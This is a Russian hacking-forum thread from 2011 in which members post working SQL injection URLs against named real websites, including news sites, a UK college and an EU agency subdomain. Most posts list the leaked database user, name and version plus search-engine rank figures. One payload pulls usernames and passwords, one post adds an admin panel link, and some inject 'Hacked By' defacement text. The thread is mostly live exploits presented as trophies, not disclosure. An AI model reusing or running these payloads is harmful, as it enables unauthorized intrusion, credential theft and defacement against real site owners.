HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14131  
Старый 29.07.2011, 22:03
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

Код:
Code:
http://www.laitkipers.ru/news.php?id=40+and+false+union+select+1,unhex%28hex%28concat%28user_name,0x3a,user_pass%29%29%29,3,4,5,6+from+user--+
ТИЦ: 10

PR: 1

Код:
Code:
http://www.yorkshirecoastcollege.ac.uk/news.php?id=479+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a)
ТИЦ: 0

PR: 6

Код:
Code:
http://rumafia.com/ru/news.php?id=-214+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16+--+
ТИЦ: 20

PR: 3

Код:
Code:
http://goldenformula.net/news.php?id=48+and+1=0+union+select+1,2,3,4,version%28%29,6--
ТИЦ: 100

PR: 4
 
Ответить с цитированием

  #14132  
Старый 29.07.2011, 23:11
Koren
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069

Репутация: 0
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.frontviewsgallery.de/exhibition.php?exhibition_id=6+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #14133  
Старый 30.07.2011, 00:12
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

Код:
Code:
http://www.astrakhanfm.ru/news/news.php?id=27341+and+1=0+union+select+1,version%28%29,database%28%29,4,user%28%29,6,7--
ТИЦ: 200

PR: 5
 
Ответить с цитированием

  #14134  
Старый 30.07.2011, 00:18
COOLBOY007
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074

Репутация: 0
Отправить сообщение для COOLBOY007 с помощью ICQ
По умолчанию

Код:
Code:
http://www.glimz.net/info.php?individual=4603%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201=1
User: glimz_net@srv11.one.com

Version: 5.0.51a-24+lenny5-log

Database: glimz_net1

PR 5

тИЦ 10
 
Ответить с цитированием

  #14135  
Старый 30.07.2011, 00:21
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

Код:
Code:
http://ngfrussia.ru/news.php?id=524+and+1=0+union+select+1,database%28%29,version%28%29,4,5,6,7,8,9,10--
DataBase: ngf

Version DB: 5.0.77

User BD: leni@localhost

ТИЦ: 40

PR: 3

Код:
Code:
http://www.chexov.net/news.php?id=571+union+select+user%28%29,database%28%29,3,4,version%28%29,6+--+
DataBase: u155206

Version DB: 5.0.77-log

User BD: u155206@localhost

ТИЦ: 4

PR: 3

P.S Смотрите комментарии
 
Ответить с цитированием

  #14136  
Старый 30.07.2011, 04:21
HeReTiC
Новичок
Регистрация: 21.09.2007
Сообщений: 5
Провел на форуме:
224572

Репутация: 10
По умолчанию

Код:
Code:
http://www.hellolulu.com/group.php?cat1_id=-1+union+select+1,2--
http://www.hellolulu.com/admin/

PR: 2

version: 5.0.45

user: hellolul@localhost

database: hellolul01
 
Ответить с цитированием

  #14137  
Старый 30.07.2011, 15:00
COOLBOY007
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074

Репутация: 0
Отправить сообщение для COOLBOY007 с помощью ICQ
По умолчанию

Код:
Code:
http://bwd.eea.europa.eu/kml_export.php?cc=' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12,13,14,15,16,17,18,19,20 and 'x'='x
User: bwdfull@localhost

Version: 5.0.77

Database: bwd

PR 9

тИЦ 4800


P.S. На данном сайте уже была найдена уязвимость, но на другом поддомене с другой БД.
 
Ответить с цитированием

  #14138  
Старый 30.07.2011, 16:15
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

Код:
Code:
http://fishres.ru/news/news.php?id=14572+and+1=0+union+select+1,2,user%28%29,version%28%29,5,6,7,8,database%28%29--
DataBase: murfish4_test

Version DB: 4.0.27-log

User BD: murfish4_test@v28.valuehost.ru

ТИЦ: 600

PR: 3

Код:
Code:
http://www.civilista.ru/news.php?id=22+and+1=0+union+select+1,2,0x4861636b6564204279204f7373747564696f212121,version%28%29,5,database%28%29,7--
DataBase: u9620_civilista_ru

Version DB: 5.0.89-log

User BD: u9620@be2

ТИЦ: 20

PR: 2

P.S Обратите внимание на title

{

Current DB: u9620_civilista_ru

Data Base Found: information_schema

Data Base Found: u9620

Data Base Found: u9620_biruk

Data Base Found: u9620_cb

Data Base Found: u9620_civilista

Data Base Found: u9620_civilista_ru

Data Base Found: u9620_mediator

Data Base Found: u9620_mucb

Data Base Found: u9620_prav66

Data Base Found: u9620_prav66_forum

Data Base Found: u9620_privlaw

Data Base Found: u9620_zagovor

Data Base Found: u9620_zhurnal

Data Base Found: u9620_zhurnal_new

Введём тут http://2ip.ru/domain-list-by-ip/ наш сайт, и получим сайты из этих баз.

}

Код:
Code:
http://kolesaonline.ru/news.php?id=66+and+1=0+union+select+1,version%28%29,database%28%29,user%28%29,5,6--
DataBase: kolesa

Version DB: 4.1.25-log

User BD: kolesa-sql@localhost

ТИЦ: 120

PR: 2

Код:
Code:
http://www.fauna-servis.ua/news.php?id=407+and+1=0+union+select+1,2,0x4861636b6564204279204f7373747564696f2121,4,5,6,concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29,8,9,10,11,12--
DataBase: faunaservis

Version DB: 5.0.51a-24+lenny5

User BD: u_faunaservi@localhost

ТИЦ: 50

PR: 3
 
Ответить с цитированием

  #14139  
Старый 30.07.2011, 17:37
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

Код:
Code:
http://www.rody18.spb.ru/news.php?id=51+and+1=0+union+select+1,2,0x5961207665726e756c73796121,concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29,5,6,7,0x3a44--
DataBase: db00143987

Version DB: 4.1.25-log

User BD: 00143987@localhost

ТИЦ: 30

PR: 3
 
Ответить с цитированием

  #14140  
Старый 30.07.2011, 18:41
COOLBOY007
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074

Репутация: 0
Отправить сообщение для COOLBOY007 с помощью ICQ
По умолчанию

Код:
Code:
http://n-europe.eu/content/index.php?p=1262%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201=1
User: u3249_old@localhost

Version: 5.1.57-rel12.8

Database: u3249_old1

PR 6

тИЦ 300


P.S. Смотрим исходный код страницы, ошибка закомментирована.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ